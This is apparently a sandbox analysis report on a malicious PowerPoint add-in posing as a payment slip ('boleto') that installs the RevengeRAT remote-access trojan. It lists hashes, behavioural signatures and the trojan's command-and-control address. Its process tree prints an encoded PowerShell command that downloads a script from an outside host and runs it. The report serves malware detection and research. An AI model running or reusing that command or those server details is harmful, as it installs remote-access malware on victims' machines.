Analysis
-
max time kernel
146s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
07-05-2023 06:26
Static task
static1
Behavioral task
behavioral1
Sample
Boleto2002301988master.ppam
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Boleto2002301988master.ppam
Resource
win10v2004-20230220-en
General
-
Target
Boleto2002301988master.ppam
-
Size
13KB
-
MD5
c323058745acd4feab0c15282709a04e
-
SHA1
8e5a988968000ecfa816352c52bd66490bc2b31a
-
SHA256
2e07606a2d33855138f2430c5aab7e1894e0e75efd2ab1b39ac76256614ca462
-
SHA512
fa719dcc24dca693779406ab5eca4f7f4a0bfb736cb91b0868105213c91e0733600a33b49b6fdf4a7bfbaed84ae4407127181b86f6ede9e6f69bcefcd60400c9
-
SSDEEP
384:dXPzPWrxbb3wiyhJ4eSTbhkIYGgAjLHU+zerK9p:VPObL7yz8hkIp5Vyw
Malware Config
Extracted
revengerat
NyanCatRevenge
b2b.ddns.com.br:5222
d9261ef3301b4b86a95
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1512 1472 powershell.exe POWERPNT.EXE -
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 28 1512 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1512 set thread context of 1888 1512 powershell.exe RegSvcs.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 1472 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1512 powershell.exe 1512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1512 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
POWERPNT.EXEpid process 1472 POWERPNT.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
POWERPNT.EXEpid process 1472 POWERPNT.EXE 1472 POWERPNT.EXE 1472 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
POWERPNT.EXEpowershell.exedescription pid process target process PID 1472 wrote to memory of 1512 1472 POWERPNT.EXE powershell.exe PID 1472 wrote to memory of 1512 1472 POWERPNT.EXE powershell.exe PID 1512 wrote to memory of 1888 1512 powershell.exe RegSvcs.exe PID 1512 wrote to memory of 1888 1512 powershell.exe RegSvcs.exe PID 1512 wrote to memory of 1888 1512 powershell.exe RegSvcs.exe PID 1512 wrote to memory of 1888 1512 powershell.exe RegSvcs.exe PID 1512 wrote to memory of 1888 1512 powershell.exe RegSvcs.exe PID 1512 wrote to memory of 1888 1512 powershell.exe RegSvcs.exe PID 1512 wrote to memory of 1888 1512 powershell.exe RegSvcs.exe PID 1512 wrote to memory of 1888 1512 powershell.exe RegSvcs.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Boleto2002301988master.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGQAYwA0ADMAOAAuADQAcwB5AG4AYwAuAGMAbwBtAC8AZABvAHcAbgBsAG8AYQBkAC8ANQAtAGgAZQBUAGYAMwBEAC8ARgBhAGMAawAuAGoAcABnAD8AZABzAGkAZAA9AEkANQBQAGEAQQBhAEoAYgAuAGIANQBhAGUANgAzAGIAMAAxADUAMQBhAGIAZgAyAGUAMgA0AGUANwBhAGMAMABjAGUANAA5ADQAZQAzADUANQAmAHMAYgBzAHIAPQBhADQAZABjAGMAOQBkAGMAMAA4ADUAMgA1ADYAYQA1AGMAZABlAGIAOQAxADMAMAA4ADkAZgBmAGQAYQA3AGEAYQBkAGMAJgBiAGkAcAA9AE0AagBBAHgATABqAEkAdwBMAGoARQB5AE4AeQA0AHkATQBUAEkAJgBsAGcAZgBwAD0ANAAwAA0ACgAnACkAOwAgAA0ACgBVAEEAYwBMAEYAVABOAEkAYgBJAEYAVgBYAGMAdABlAEkAUwBWAE0AVgBoAFAAaQBlAHIASgBGAEkAYQBBAE0AUABzAEYATgBYAEcAVwBEAHcATQBEAFoAdgByAE8ARgBjAEwAdABBAFgAcgBNAHYAawBVAEgAdwANAAoA""2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:1888
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82